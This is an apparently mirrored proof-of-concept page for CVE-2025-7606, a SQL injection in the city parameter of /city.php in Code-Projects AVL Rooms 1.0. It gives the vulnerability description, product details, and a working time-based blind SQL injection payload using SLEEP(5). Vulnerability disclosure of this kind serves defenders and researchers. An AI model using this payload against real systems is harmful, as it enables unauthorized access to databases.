CVE-2025-7606 PoC — Code-Projects AVL Rooms 安全漏洞

Source

https://github.com/sunhuiHi666/CVE-2025-7606

Associated Vulnerability

Title:Code-Projects AVL Rooms 安全漏洞 (CVE-2025-7606)
Description:Code-Projects AVL Rooms是Code-Projects开源的一个AVL房间系统。 Code-Projects AVL Rooms 1.0版本存在安全漏洞，该漏洞源于文件/city.php中参数city的错误操作导致SQL注入。

Readme

# CVE-2025-7606
code-projects AVL Rooms Project V1.0/city.php SQL injection
# NAME OF AFFECTED PRODUCT(S)
AVL Rooms
# Vendor Homepage
https://code-projects.org/avl-rooms-in-php-css-javascript-and-mysql-free-download/
# submitter
dazhi
# Vulnerable File
/city.php
# VERSION(S)
V1.0
# Software Link
https://code-projects.org/avl-rooms-in-php-css-javascript-and-mysql-free-download/

#  Payload:
---
    city (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: city=1' AND (SELECT 5303 FROM (SELECT(SLEEP(5)))kuAW) AND 'FOfS'='FOfS&date=07/13/2025
---

File Snapshot


 [4.0K]  /data/pocs/d9cd79da1135903bcab5e3c6fbe61aaee42472f8
└── [ 605]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!